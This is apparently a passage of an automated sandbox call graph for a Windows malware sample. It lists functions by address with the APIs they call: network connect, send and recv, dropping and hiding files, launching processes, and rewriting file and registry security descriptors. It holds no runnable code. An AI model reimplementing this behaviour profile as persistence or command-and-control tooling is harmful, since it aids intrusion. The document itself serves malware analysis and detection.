API calls 6273->6274 6275 121e4e 6274->6275 6276 121e77 6275->6276 6766 12df70 6275->6766 6732 12ea84 6276->6732 6280 121e6c 6282 12df70 12 API calls 6280->6282 6281 12e819 11 API calls 6283 121e93 6281->6283 6282->6276 6736 12199c inet_addr LoadLibraryA 6283->6736 6286 12e819 11 API calls 6287 121eb9 6286->6287 6288 121ed8 6287->6288 6290 12f04e 4 API calls 6287->6290 6289 12e819 11 API calls 6288->6289 6291 121eee 6289->6291 6292 121ec9 6290->6292 6293 121f0a 6291->6293 6750 121b71 6291->6750 6294 12ea84 30 API calls 6292->6294 6296 12e819 11 API calls 6293->6296 6294->6288 6298 121f23 6296->6298 6297 121efd 6299 12ea84 30 API calls 6297->6299 6300 121f3f 6298->6300 6754 121bdf 6298->6754 6299->6293 6301 12e819 11 API calls 6300->6301 6303 121f5e 6301->6303 6305 121f77 6303->6305 6307 12ea84 30 API calls 6303->6307 6762 1230b5 6305->6762 6306 12ea84 30 API calls 6306->6300 6307->6305 6310 121f8e GetTickCount 6310->6143 6312 126ec3 2 API calls 6312->6310 6314 126ec3 2 API calls 6313->6314 6315 1280eb 6314->6315 6316 1280f9 6315->6316 6317 1280ef 6315->6317 6833 12704c 6316->6833 6820 127ee6 6317->6820 6320 128269 CreateThread 6339 125e6c 6320->6339 7295 12877e 6320->7295 6321 1280f4 6321->6320 6323 12675c 21 API calls 6321->6323 6322 128110 6322->6321 6324 128156 RegOpenKeyExA 6322->6324 6329 128244 6323->6329 6325 128216 6324->6325 6326 12816d RegQueryValueExA 6324->6326 6325->6321 6327 1281f7 6326->6327 6328 12818d 6326->6328 6330 12820d RegCloseKey 6327->6330 6332 12ec2e codecvt 4 API calls 6327->6332 6328->6327 6333 12ebcc 4 API calls 6328->6333 6329->6320 6331 12ec2e codecvt 4 API calls 6329->6331 6330->6325 6331->6320 6338 1281dd 6332->6338 6334 1281a0 6333->6334 6334->6330 6335 1281aa RegQueryValueExA 6334->6335 6335->6327 6336 1281c4 6335->6336 6337 12ebcc 4 API calls 6336->6337 6337->6338 6338->6330 6935 12ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 6339->6935 6341 125e71 6936 12e654 6341->6936 6343 125ec1 6344 123132 6343->6344 6345 12df70 12 API calls 6344->6345 6346 12313b 6345->6346 6347 12c125 6346->6347 6947 12ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 6347->6947 6349 12c12d 6350 12e654 13 API calls 6349->6350 6351 12c2bd 6350->6351 6352 12e654 13 API calls 6351->6352 6353 12c2c9 6352->6353 6354 12e654 13 API calls 6353->6354 6355 12a47a 6354->6355 6356 128db1 6355->6356 6357 128dbc 6356->6357 6358 12e654 13 API calls 6357->6358 6359 128dec Sleep 6358->6359 6359->6172 6361 12c92f 6360->6361 6362 12c93c 6361->6362 6959 12c517 6361->6959 6364 12e819 11 API calls 6362->6364 6379 12ca2b 6362->6379 6365 12c96a 6364->6365 6366 12e819 11 API calls 6365->6366 6367 12c97d 6366->6367 6368 12e819 11 API calls 6367->6368 6369 12c990 6368->6369 6370 12ebcc 4 API calls 6369->6370 6371 12c9aa 6369->6371 6370->6371 6371->6379 6948 122684 6371->6948 6376 12ca26 6976 12c8aa 6376->6976 6379->6172 6380 12ca44 6381 12ca4b closesocket 6380->6381 6382 12ca83 6380->6382 6381->6376 6383 12ea84 30 API calls 6382->6383 6384 12caac 6383->6384 6385 12f04e 4 API calls 6384->6385 6386 12cab2 6385->6386 6387 12ea84 30 API calls 6386->6387 6388 12caca 6387->6388 6389 12ea84 30 API calls 6388->6389 6390 12cad9 6389->6390 6980 12c65c 6390->6980 6393 12cb60 closesocket 6393->6379 6395 12dad2 closesocket 6396 12e318 23 API calls 6395->6396 6397 12dae0 6396->6397 6397->6379 6398 12df4c 20 API calls 6457 12cb70 6398->6457 6404 12e654 13 API calls 6404->6457 6407 12f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 6407->6457 6410 12c65c send GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 6410->6457 6411 12ea84 30 API calls 6411->6457 6412 12d569 closesocket Sleep 7027 12e318 6412->7027 6413 12d815 wsprintfA 6413->6457 6414 12cc1c GetTempPathA 6414->6457 6415 12c517 23 API calls 6415->6457 6417 127ead 6 API calls 6417->6457 6418 12e8a1 30 API calls 6418->6457 6419 12d582 ExitProcess 6420 12cfe3 GetSystemDirectoryA 6420->6457 6421 12cfad GetEnvironmentVariableA 6421->6457 6422 12675c 21 API calls 6422->6457 6423 12d027 GetSystemDirectoryA 6423->6457 6424 12d105 lstrcatA 6424->6457 6425 12ef1e lstrlenA 6425->6457 6426 12cc9f CreateFileA 6428 12ccc6 WriteFile 6426->6428 6426->6457 6427 12ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 6427->6457 6431 12cdcc CloseHandle 6428->6431 6432 12cced CloseHandle 6428->6432 6429 128e26 GetSystemTime SystemTimeToFileTime CreateFileW DeviceIoControl CloseHandle 6429->6457 6430 12d15b CreateFileA 6433 12d182 WriteFile CloseHandle 6430->6433 6430->6457 6431->6457 6438 12cd2f 6432->6438 6433->6457 6434 12cd16 wsprintfA 6434->6438 6435 12d149 SetFileAttributesA 6435->6430 6436 12d36e GetEnvironmentVariableA 6436->6457 6437 12d1bf SetFileAttributesA 6437->6457 6438->6434 7009 127fcf 6438->7009 6439 12d22d GetEnvironmentVariableA 6439->6457 6440 12d3af lstrcatA 6442 12d3f2 CreateFileA 6440->6442 6440->6457 6445 12d415 WriteFile CloseHandle 6442->6445 6442->6457 6444 127fcf 64 API calls 6444->6457 6445->6457 6446 12cd81 WaitForSingleObject CloseHandle CloseHandle 6448 12f04e 4 API calls 6446->6448 6447 12cda5 6449 127ee6 64 API calls 6447->6449 6448->6447 6452 12cdbd DeleteFileA 6449->6452 6450 12d3e0 SetFileAttributesA 6450->6442 6451 12d26e lstrcatA 6454 12d2b1 CreateFileA 6451->6454 6451->6457 6452->6457 6453 12d4b1 CreateProcessA 6455 12d4e8 CloseHandle CloseHandle 6453->6455 6453->6457 6454->6457 6458 12d2d8 WriteFile CloseHandle 6454->6458 6455->6457 6456 12d452 SetFileAttributesA 6456->6457 6457->6395 6457->6398 6457->6404 6457->6407 6457->6410 6457->6411 6457->6412 6457->6413 6457->6414 6457->6415 6457->6417 6457->6418 6457->6420 6457->6421 6457->6422 6457->6423 6457->6424 6457->6425 6457->6426 6457->6427 6457->6429 6457->6430 6457->6435 6457->6436 6457->6437 6457->6439 6457->6440 6457->6442 6457->6444 6457->6450 6457->6451 6457->6453 6457->6454 6457->6456 6459 127ee6 64 API calls 6457->6459 6461 12d29f SetFileAttributesA 6457->6461 6463 12d31d SetFileAttributesA 6457->6463 6988 12c75d 6457->6988 7000 127e2f 6457->7000 7022 127ead 6457->7022 7032 1231d0 6457->7032 7049 123c09 6457->7049 7059 123a00 6457->7059 7063 12e7b4 6457->7063 7066 12c06c 6457->7066 7072 126f5f GetUserNameA 6457->7072 7083 12e854 6457->7083 7093 127dd6 6457->7093 6458->6457 6459->6457 6461->6454 6463->6457 6465 126784 CreateFileA 6464->6465 6466 12677a SetFileAttributesA 6464->6466 6467 1267a4 CreateFileA 6465->6467 6468 1267b5 6465->6468 6466->6465 6467->6468 6469 1267c5 6468->6469 6470 1267ba SetFileAttributesA 6468->6470 6471 126977 6469->6471 6472 1267cf GetFileSize 6469->6472 6470->6469 6471->6159 6492 126a60 CreateFileA 6471->6492 6473 1267e5 6472->6473 6491 126965 6472->6491 6475 1267ed ReadFile 6473->6475 6473->6491 6474 12696e FindCloseChangeNotification 6474->6471 6476 126811 SetFilePointer 6475->6476 6475->6491 6477 12682a ReadFile 6476->6477 6476->6491 6478 126848 SetFilePointer 6477->6478 6477->6491 6479 126867 6478->6479 6478->6491 6480 1268d5 6479->6480 6481 126878 ReadFile 6479->6481 6480->6474 6483 12ebcc 4 API calls 6480->6483 6482 126891 6481->6482 6485 1268d0 6481->6485 6482->6481 6482->6485 6484 1268f8 6483->6484 6486 126900 SetFilePointer 6484->6486 6484->6491 6485->6480 6487 12695a 6486->6487 6488 12690d ReadFile 6486->6488 6490 12ec2e codecvt 4 API calls 6487->6490 6488->6487 6489 126922 6488->6489 6489->6474 6490->6491 6491->6474 6493 126a8f GetDiskFreeSpaceA 6492->6493 6494 126b8c GetLastError 6492->6494 6496 126ac5 6493->6496 6504 126ad7 6493->6504 6495 126b86 6494->6495 6495->6179 7178 12eb0e 6496->7178 6500 126b56 CloseHandle 6500->6495 6503 126b65 GetLastError CloseHandle 6500->6503 6501 126b36 GetLastError CloseHandle 6502 126b7f DeleteFileA 6501->6502 6502->6495 6503->6502 7182 126987 6504->7182 6506 1296b9 6505->6506 6507 1273ff 17 API calls 6506->6507 6508 1296e2 6507->6508 6509 1296f7 6508->6509 6510 12704c 16 API calls 6508->6510 6509->6152 6509->6153 6510->6509 6512 1242a5 6511->6512 6513 12429d 6511->6513 7188 123ecd 6512->7188 6513->6157 6513->6174 6515 1242b0 7192 124000 6515->7192 6517 1243c1 CloseHandle 6517->6513 6518 1242b6 6518->6513 6518->6517 7198 123f18 WriteFile 6518->7198 6523 1243ba CloseHandle 6523->6517 6524 124318 6525 123f18 4 API calls 6524->6525 6526 124331 6525->6526 6527 123f18 4 API calls 6526->6527 6528 12434a 6527->6528 6529 12ebcc 4 API calls 6528->6529 6530 124350 6529->6530 6531 123f18 4 API calls 6530->6531 6532 124389 6531->6532 6533 12ec2e codecvt 4 API calls 6532->6533 6534 12438f 6533->6534 6535 123f8c 4 API calls 6534->6535 6536 12439f CloseHandle CloseHandle 6535->6536 6536->6513 6538 1299eb 6537->6538 6539 129a2f lstrcatA 6538->6539 6540 12ee2a 6539->6540 6541 129a4b lstrcatA 6540->6541 6542 126a60 13 API calls 6541->6542 6543 129a60 6542->6543 6543->6183 6543->6210 6544 126dc2 6543->6544 6545 126e33 6544->6545 6546 126dd7 6544->6546 6545->6197 6547 126cc9 5 API calls 6546->6547 6548 126ddc 6547->6548 6548->6548 6549 126e02 GetVolumeInformationA 6548->6549 6550 126e24 6548->6550 6549->6550 6550->6545 6552 126cdc GetModuleHandleA GetProcAddress 6551->6552 6557 126d8b 6551->6557 6553 126d12 GetSystemDirectoryA 6552->6553 6554 126cfd 6552->6554 6555 126d27 GetWindowsDirectoryA 6553->6555 6556 126d1e 6553->6556 6554->6553 6554->6557 6558 126d42 6555->6558 6556->6555 6556->6557 6557->6207 6559 12ef1e lstrlenA 6558->6559 6559->6557 7206 121910 6560->7206 6563 12934a GetModuleHandleA GetModuleFileNameA 6565 12937f 6563->6565 6566 1293a4 6565->6566 6567 1293d9 6565->6567 6568 1293c3 wsprintfA 6566->6568 6569 129401 wsprintfA 6567->6569 6571 129415 6568->6571 6569->6571 6570 1294a0 6572 126edd 5 API calls 6570->6572 6571->6570 6573 126cc9 5 API calls 6571->6573 6574 1294ac 6572->6574 6580 129439 6573->6580 6575 12962f 6574->6575 6576 1294e8 RegOpenKeyExA 6574->6576 6581 129646 6575->6581 7221 121820 6575->7221 6578 129502 6576->6578 6579 1294fb 6576->6579 6583 12951f RegQueryValueExA 6578->6583 6579->6575 6585 12958a 6579->6585 6584 12ef1e lstrlenA 6580->6584 6590 1295d6 6581->6590 7227 1291eb 6581->7227 6587 129530 6583->6587 6588 129539 6583->6588 6589 129462 6584->6589 6585->6581 6586 129593 6585->6586 6586->6590 7208 12f0e4 6586->7208 6591 12956e RegCloseKey 6587->6591 6592 129556 RegQueryValueExA 6588->6592 6593 12947e wsprintfA 6589->6593 6590->6217 6590->6218 6591->6579 6592->6587 6592->6591 6593->6570 6595 1295bb 6595->6590 7215 1218e0 6595->7215 6598 122544 6597->6598 6599 12972d RegOpenKeyExA 6598->6599 6600 129740 6599->6600 6601 129765 6599->6601 6602 12974f RegDeleteValueA RegCloseKey 6600->6602 6601->6192 6602->6601 6604 122554 lstrcatA 6603->6604 6605 12ee2a 6604->6605 6606 12a0ec lstrcatA 6605->6606 6606->6225 6608 12ec37 6607->6608 6609 12a15d 6607->6609 6610 12eba0 codecvt 2 API calls 6608->6610 6609->6157 6609->6159 6611 12ec3d GetProcessHeap RtlFreeHeap 6610->6611 6611->6609 6613 122544 6612->6613 6614 12919e wsprintfA 6613->6614 6615 1291bb 6614->6615 7266 129064 GetTempPathA 6615->7266 6618 1291e7 6618->6179 6619 1291d5 ShellExecuteA 6619->6618 6621 126ed5 6620->6621 6622 126ecc 6620->6622 6621->6212 6623 126e36 2 API calls 6622->6623 6623->6621 6625 1298f6 6624->6625 6626 124280 30 API calls 6625->6626 6627 129904 Sleep 6625->6627 6628 129915 6625->6628 6626->6625 6627->6625 6627->6628 6630 129947 6628->6630 7273 12977c 6628->7273 6630->6208 6632 12dd41 InterlockedExchange 6631->6632 6633 12dd20 GetCurrentThreadId 6632->6633 6634 12dd4a 6632->6634 6635 12dd53 GetCurrentThreadId 6633->6635 6636 12dd2e GetTickCount 6633->6636 6634->6635 6635->6244 6637 12dd39 Sleep 6636->6637 6638 12dd4c 6636->6638 6637->6632 6638->6635 6640 12dbf0 6639->6640 6672 12db67 GetEnvironmentVariableA 6640->6672 6642 12dc19 6643 12dcda 6642->6643 6644 12db67 3 API calls 6642->6644 6643->6246 6645 12dc5c 6644->6645 6645->6643 6646 12db67 3 API calls 6645->6646 6647 12dc9b 6646->6647 6647->6643 6648 12db67 3 API calls 6647->6648 6648->6643 6650 12e528 6649->6650 6651 12e3f4 6649->6651 6650->6257 6652 12e434 RegQueryValueExA 6651->6652 6653 12e458 6652->6653 6654 12e51d RegCloseKey 6652->6654 6655 12e46e RegQueryValueExA 6653->6655 6654->6650 6655->6653 6656 12e488 6655->6656 6656->6654 6657 12db2e 8 API calls 6656->6657 6658 12e499 6657->6658 6658->6654 6659 12e4b9 RegQueryValueExA 6658->6659 6660 12e4e8 6658->6660 6659->6658 6659->6660 6660->6654 6661 12e332 14 API calls 6660->6661 6662 12e513 6661->6662 6662->6654 6664 12db55 6663->6664 6665 12db3a 6663->6665 6664->6248 6664->6253 6676 12ebed 6665->6676 6694 12f04e SystemTimeToFileTime GetSystemTimeAsFileTime 6667->6694 6669 12e3be 6669->6248 6670 12e342 6670->6669 6697 12de24 6670->6697 6673 12dbca 6672->6673 6674 12db89 lstrcpyA CreateFileA 6672->6674 6673->6642 6674->6642 6677 12ec01 6676->6677 6678 12ebf6 6676->6678 6688 12eba0 6677->6688 6685 12ebcc GetProcessHeap RtlAllocateHeap 6678->6685 6686 12eb74 2 API calls 6685->6686 6687 12ebe8 6686->6687 6687->6664 6689 12eba7 GetProcessHeap HeapSize 6688->6689 6690 12ebbf GetProcessHeap HeapReAlloc 6688->6690 6689->6690 6691 12eb74 6690->6691 6692 12eb7b GetProcessHeap HeapSize 6691->6692 6693 12eb93 6691->6693 6692->6693 6693->6664 6708 12eb41 6694->6708 6696 12f0b7 6696->6670 6698 12de3a 6697->6698 6704 12de4e 6698->6704 6717 12dd84 6698->6717 6701 12ebed 8 API calls 6706 12def6 6701->6706 6702 12de9e 6702->6701 6702->6704 6703 12de76 6721 12ddcf 6703->6721 6704->6670 6706->6704 6707 12ddcf lstrcmpA 6706->6707 6707->6704 6709 12eb61 6708->6709 6710 12eb4a 6708->6710 6709->6696 6713 12eae4 6710->6713 6712 12eb54 6712->6696 6712->6709 6714 12eb02 GetProcAddress 6713->6714 6715 12eaed LoadLibraryA 6713->6715 6714->6712 6715->6714 6716 12eb01 6715->6716 6716->6712 6718 12ddc5 6717->6718 6719 12dd96 6717->6719 6718->6702 6718->6703 6719->6718 6720 12ddad lstrcmpiA 6719->6720 6720->6718 6720->6719 6722 12de20 6721->6722 6724 12dddd 6721->6724 6722->6704 6723 12ddfa lstrcmpA 6723->6724 6724->6722 6724->6723 6726 12dd05 6 API calls 6725->6726 6727 12e821 6726->6727 6728 12dd84 lstrcmpiA 6727->6728 6729 12e82c 6728->6729 6731 12e844 6729->6731 6775 122480 6729->6775 6731->6273 6733 12ea98 6732->6733 6784 12e8a1 6733->6784 6735 121e84 6735->6281 6737 1219d5 GetProcAddress GetProcAddress GetProcAddress 6736->6737 6740 1219ce 6736->6740 6738 121ab3 FreeLibrary 6737->6738 6739 121a04 6737->6739 6738->6740 6739->6738 6741 121a14 GetBestInterface GetProcessHeap 6739->6741 6740->6286 6741->6740 6742 121a2e HeapAlloc 6741->6742 6742->6740 6743 121a42 GetAdaptersInfo 6742->6743 6744 121a62 6743->6744 6745 121a52 HeapReAlloc 6743->6745 6746 121aa1 FreeLibrary 6744->6746 6747 121a69 GetAdaptersInfo 6744->6747 6745->6744 6746->6740 6747->6746 6748 121a75 HeapFree 6747->6748 6748->6746 6812 121ac3 LoadLibraryA 6750->6812 6753 121bcf 6753->6297 6755 121ac3 13 API calls 6754->6755 6756 121c09 6755->6756 6757 121c5a 6756->6757 6758 121c0d GetComputerNameA 6756->6758 6757->6306 6759 121c45 GetVolumeInformationA 6758->6759 6760 121c1f 6758->6760 6759->6757 6760->6759 6761 121c41 6760->6761 6761->6757 6763 12ee2a 6762->6763 6764 1230d0 gethostname gethostbyname 6763->6764 6765 121f82 6764->6765 6765->6310 6765->6312 6767 12dd05 6 API calls 6766->6767 6768 12df7c 6767->6768 6769 12dd84 lstrcmpiA 6768->6769 6773 12df89 6769->6773 6770 12dfc4 6770->6280 6771 12ddcf lstrcmpA 6771->6773 6772 12ec2e codecvt 4 API calls 6772->6773 6773->6770 6773->6771 6773->6772 6774 12dd84 lstrcmpiA 6773->6774 6774->6773 6778 122419 lstrlenA 6775->6778 6777 122491 6777->6731 6779 122474 6778->6779 6780 12243d lstrlenA 6778->6780 6779->6777 6781 122464 lstrlenA 6780->6781 6782 12244e lstrcmpiA 6780->6782 6781->6779 6781->6780 6782->6781 6783 12245c 6782->6783 6783->6779 6783->6781 6785 12dd05 6 API calls 6784->6785 6786 12e8b4 6785->6786 6787 12dd84 lstrcmpiA 6786->6787 6788 12e8c0 6787->6788 6789 12e90a 6788->6789 6790 12e8c8 lstrcpynA 6788->6790 6792 122419 4 API calls 6789->6792 6800 12ea27 6789->6800 6791 12e8f5 6790->6791 6805 12df4c 6791->6805 6793 12e926 lstrlenA lstrlenA 6792->6793 6795 12e96a 6793->6795 6796 12e94c lstrlenA 6793->6796 6799 12ebcc 4 API calls 6795->6799 6795->6800 6796->6795 6797 12e901 6798 12dd84 lstrcmpiA 6797->6798 6798->6789 6801 12e98f 6799->6801 6800->6735 6801->6800 6802 12df4c 20 API calls 6801->6802 6803 12ea1e 6802->6803 6804 12ec2e codecvt 4 API calls 6803->6804 6804->6800 6806 12dd05 6 API calls 6805->6806 6807 12df51 6806->6807 6808 12f04e 4 API calls 6807->6808 6809 12df58 6808->6809 6810 12de24 10 API calls 6809->6810 6811 12df63 6810->6811 6811->6797 6813 121ae2 GetProcAddress 6812->6813 6814 121b68 GetComputerNameA GetVolumeInformationA 6812->6814 6813->6814 6817 121af5 6813->6817 6814->6753 6815 121b1c GetAdaptersAddresses 6815->6817 6818 121b29 6815->6818 6816 12ebed 8 API calls 6816->6817 6817->6815 6817->6816 6817->6818 6818->6814 6818->6818 6819 12ec2e codecvt 4 API calls 6818->6819 6819->6814 6821 126ec3 2 API calls 6820->6821 6822 127ef4 6821->6822 6823 127fc9 6822->6823 6856 1273ff 6822->6856 6823->6321 6825 127f16 6825->6823 6876 127809 GetUserNameA 6825->6876 6827 127f63 6827->6823 6900 12ef1e lstrlenA 6827->6900 6830 12ef1e lstrlenA 6831 127fb7 6830->6831 6902 127a95 RegOpenKeyExA 6831->6902 6834 127073 6833->6834 6835 1270b9 RegOpenKeyExA 6834->6835 6836 1270d0 6835->6836 6850 1271b8 6835->6850 6837 126dc2 6 API calls 6836->6837 6840 1270d5 6837->6840 6838 12719b RegEnumValueA 6839 1271af RegCloseKey 6838->6839 6838->6840 6839->6850 6840->6838 6842 1271d0 6840->6842 6933 12f1a5 lstrlenA 6840->6933 6843 127205 RegCloseKey 6842->6843 6844 127227 6842->6844 6843->6850 6845 1272b8 ___ascii_stricmp 6844->6845 6846 12728e RegCloseKey 6844->6846 6847 1272cd RegCloseKey 6845->6847 6848 1272dd 6845->6848 6846->6850 6847->6850 6849 127311 RegCloseKey 6848->6849 6852 127335 6848->6852 6849->6850 6850->6322 6851 1273d5 RegCloseKey 6853 1273e4 6851->6853 6852->6851 6854 12737e GetFileAttributesExA 6852->6854 6855 127397 6852->6855 6854->6855 6855->6851 6857 12741b 6856->6857 6858 126dc2 6 API calls 6857->6858 6859 12743f 6858->6859 6860 127469 RegOpenKeyExA 6859->6860 6861 127487 ___ascii_stricmp 6860->6861 6863 1277f9 6860->6863 6862 127703 RegEnumKeyA 6861->6862 6865 1274d2 RegOpenKeyExA 6861->6865 6866 12772c 6861->6866 6867 127521 RegQueryValueExA 6861->6867 6871 1276e4 RegCloseKey 6861->6871 6873 12f1a5 lstrlenA 6861->6873 6874 12777e GetFileAttributesExA 6861->6874 6875 127769 6861->6875 6862->6861 6864 127714 RegCloseKey 6862->6864 6863->6825 6864->6863 6865->6861 6868 127742 RegCloseKey 6866->6868 6869 12774b 6866->6869 6867->6861 6868->6869 6870 1277ec RegCloseKey 6869->6870 6870->6863 6871->6861 6872 1277e3 RegCloseKey 6872->6870 6873->6861 6874->6875 6875->6872 6877 12783d LookupAccountNameA 6876->6877 6883 127a8d 6876->6883 6878 127874 GetLengthSid GetFileSecurityA 6877->6878 6877->6883 6879 1278a8 GetSecurityDescriptorOwner 6878->6879 6878->6883 6880 1278c5 EqualSid 6879->6880 6881 12791d GetSecurityDescriptorDacl 6879->6881 6880->6881 6882 1278dc LocalAlloc 6880->6882 6881->6883 6894 127941 6881->6894 6882->6881 6884 1278ef InitializeSecurityDescriptor 6882->6884 6883->6827 6885 127916 LocalFree 6884->6885 6886 1278fb SetSecurityDescriptorOwner 6884->6886 6885->6881 6886->6885 6888 12790b SetFileSecurityA 6886->6888 6887 12795b GetAce 6887->6894 6888->6885 6889 127980 EqualSid 6889->6894 6890 127a3d 6890->6883 6893 127a43 LocalAlloc 6890->6893 6891 1279be EqualSid 6891->6894 6892 12799d DeleteAce 6892->6894 6893->6883 6895 127a56 InitializeSecurityDescriptor 6893->6895 6894->6883 6894->6887 6894->6889 6894->6890 6894->6891 6894->6892 6896 127a62 SetSecurityDescriptorDacl 6895->6896 6897 127a86 LocalFree 6895->6897 6896->6897 6898 127a73 SetFileSecurityA 6896->6898 6897->6883 6898->6897 6899 127a83 6898->6899 6899->6897 6901 127fa6 6900->6901 6901->6830 6903 127ac4 6902->6903 6904 127acb GetUserNameA 6902->6904 6903->6823 6905 127da7 RegCloseKey 6904->6905 6906 127aed LookupAccountNameA 6904->6906 6905->6903 6906->6905 6907 127b24 RegGetKeySecurity 6906->6907 6907->6905 6908 127b49 GetSecurityDescriptorOwner 6907->6908 6909 127b63 EqualSid 6908->6909 6910 127bb8 GetSecurityDescriptorDacl 6908->6910 6909->6910 6911 127b74 LocalAlloc 6909->6911 6912 127da6 6910->6912 6918 127bdc 6910->6918 6911->6910 6913 127b8a InitializeSecurityDescriptor 6911->6913 6912->6905 6914 127bb1 LocalFree 6913->6914 6915 127b96 SetSecurityDescriptorOwner 6913->6915 6914->6910 6915->6914 6917 127ba6 RegSetKeySecurity 6915->6917 6916 127bf8 GetAce 6916->6918 6917->6914 6918->6912 6918->6916 6919 127c1d EqualSid 6918->6919 6920 127cd9 6918->6920 6921 127c5f EqualSid 6918->6921 6922 127c3a DeleteAce 6918->6922 6919->6918 6920->6912 6923 127d5a LocalAlloc 6920->6923 6924 127cf2 RegOpenKeyExA 6920->6924 6921->6918 6922->6918 6923->6912 6925 127d70 InitializeSecurityDescriptor 6923->6925 6924->6923 6930 127d0f 6924->6930 6926 127d9f LocalFree 6925->6926 6927 127d7c SetSecurityDescriptorDacl 6925->6927 6926->6912 6927->6926 6928 127d8c RegSetKeySecurity 6927->6928 6928->6926 6929 127d9c 6928->6929 6929->6926 6931 127d43 RegSetValueExA 6930->6931 6931->6923 6932 127d54 6931->6932 6932->6923 6934 12f1c3 6933->6934 6934->6840 6935->6341 6937 12dd05 6 API calls 6936->6937 6938 12e65f 6937->6938 6939 12e6a5 6938->6939 6941 12e68c lstrcmpA 6938->6941 6940 12ebcc 4 API calls 6939->6940 6944 12e6f5 6939->6944 6942 12e6b0 6940->6942 6941->6938 6943 12e6e0 lstrcpynA 6942->6943 6942->6944 6946 12e6b7 6942->6946 6943->6944 6945 12e71d lstrcmpA 6944->6945 6944->6946 6945->6944 6946->6343 6947->6349 6949 122692 inet_addr 6948->6949 6950 12268e 6948->6950 6949->6950 6951 12269e gethostbyname 6949->6951 6952 12f428 6950->6952 6951->6950 7100 12f315 6952->7100 6955 12f43e 6956 12f473 recv 6955->6956 6957 12f458 6956->6957 6958 12f47c 6956->6958 6957->6956 6957->6958 6958->6380 6960 12c525 6959->6960 6961 12c532 6959->6961 6960->6961 6964 12ec2e codecvt 4 API calls 6960->6964 6962 12c548 6961->6962 7113 12e7ff 6961->7113 6965 12e7ff lstrcmpiA 6962->6965 6973 12c54f 6962->6973 6964->6961 6966 12c615 6965->6966 6967 12ebcc 4 API calls 6966->6967 6966->6973 6967->6973 6968 12c5d1 6971 12ebcc 4 API calls 6968->6971 6970 12e819 11 API calls 6972 12c5b7 6970->6972 6971->6973 6974 12f04e 4 API calls 6972->6974 6973->6362 6975 12c5bf 6974->6975 6975->6962 6975->6968 6978 12c8d2 6976->6978 6977 12c907 6977->6379 6978->6977 6979 12c517 23 API calls 6978->6979 6979->6977 6981 12c67d 6980->6981 6982 12c670 6980->6982 6984 12ebcc 4 API calls 6981->6984 6985 12c699 6981->6985 6983 12ebcc 4 API calls 6982->6983 6983->6981 6984->6985 6986 12c6f3 6985->6986 6987 12c73c send 6985->6987 6986->6393 6986->6457 6987->6986 6989 12c77d 6988->6989 6990 12c770 6988->6990 6992 12c799 6989->6992 6993 12ebcc 4 API calls 6989->6993 6991 12ebcc 4 API calls 6990->6991 6991->6989 6994 12c7b5 6992->6994 6996 12ebcc 4 API calls 6992->6996 6993->6992 6995 12f43e recv 6994->6995 6997 12c7cb 6995->6997 6996->6994 6998 12f43e recv 6997->6998 6999 12c7d3 6997->6999 6998->6999 6999->6457 7116 127db7 7000->7116 7003 127e70 7004 127e96 7003->7004 7006 12f04e 4 API calls 7003->7006 7004->6457 7005 12f04e 4 API calls 7007 127e4c 7005->7007 7006->7004 7007->7003 7008 12f04e 4 API calls 7007->7008 7008->7003 7010 126ec3 2 API calls 7009->7010 7011 127fdd 7010->7011 7012 1273ff 17 API calls 7011->7012 7021 1280c2 CreateProcessA 7011->7021 7013 127fff 7012->7013 7014 127809 21 API calls 7013->7014 7013->7021 7015 12804d 7014->7015 7016 12ef1e lstrlenA 7015->7016 7015->7021 7017 12809e 7016->7017 7018 12ef1e lstrlenA 7017->7018 7019 1280af 7018->7019 7020 127a95 24 API calls 7019->7020 7020->7021 7021->6446 7021->6447 7023 127db7 2 API calls 7022->7023 7024 127eb8 7023->7024 7025 12f04e 4 API calls 7024->7025 7026 127ece DeleteFileA 7025->7026 7026->6457 7028 12dd05 6 API calls 7027->7028 7029 12e31d 7028->7029 7120 12e177 7029->7120 7031 12e326 7031->6419 7033 1231f3 7032->7033 7043 1231ec 7032->7043 7034 12ebcc 4 API calls 7033->7034 7048 1231fc 7034->7048 7035 12344b 7036 123459 7035->7036 7037 12349d 7035->7037 7039 12f04e 4 API calls 7036->7039 7038 12ec2e codecvt 4 API calls 7037->7038 7038->7043 7040 12345f 7039->7040 7041 1230fa 4 API calls 7040->7041 7041->7043 7042 12ebcc GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 7042->7048 7043->6457 7044 12344d 7045 12ec2e codecvt 4 API calls 7044->7045 7045->7035 7047 123141 lstrcmpiA 7047->7048 7048->7035 7048->7042 7048->7043 7048->7044 7048->7047 7146 1230fa GetTickCount 7048->7146 7050 1230fa 4 API calls 7049->7050 7051 123c1a 7050->7051 7052 123ce6 7051->7052 7151 123a72 7051->7151 7052->6457 7055 123a72 9 API calls 7057 123c5e 7055->7057 7056 123a72 9 API calls 7056->7057 7057->7052 7057->7056 7058 12ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 7057->7058 7058->7057 7060 123a10 7059->7060 7061 1230fa 4 API calls 7060->7061 7062 123a1a 7061->7062 7062->6457 7064 12dd05 6 API calls 7063->7064 7065 12e7be 7064->7065 7065->6457 7067 12c105 7066->7067 7068 12c07e wsprintfA 7066->7068 7067->6457 7160 12bfce GetTickCount wsprintfA 7068->7160 7070 12c0ef 7161 12bfce GetTickCount wsprintfA 7070->7161 7073 127047 7072->7073 7074 126f88 LookupAccountNameA 7072->7074 7073->6457 7076 127025 7074->7076 7077 126fcb 7074->7077 7162 126edd 7076->7162 7079 126fdb ConvertSidToStringSidA 7077->7079 7079->7076 7081 126ff1 7079->7081 7082 127013 LocalFree 7081->7082 7082->7076 7084 12dd05 6 API calls 7083->7084 7085 12e85c 7084->7085 7086 12dd84 lstrcmpiA 7085->7086 7087 12e867 7086->7087 7088 12e885 lstrcpyA 7087->7088 7173 1224a5 7087->7173 7176 12dd69 7088->7176 7094 127db7 2 API calls 7093->7094 7095 127de1 7094->7095 7096 127e16 7095->7096 7097 12f04e 4 API calls 7095->7097 7096->6457 7098 127df2 7097->7098 7098->7096 7099 12f04e 4 API calls 7098->7099 7099->7096 7101 12ca1d 7100->7101 7102 12f33b 7100->7102 7101->6376 7101->6955 7103 12f347 htons socket 7102->7103 7104 12f382 ioctlsocket 7103->7104 7105 12f374 closesocket 7103->7105 7106 12f3aa connect select 7104->7106 7107 12f39d 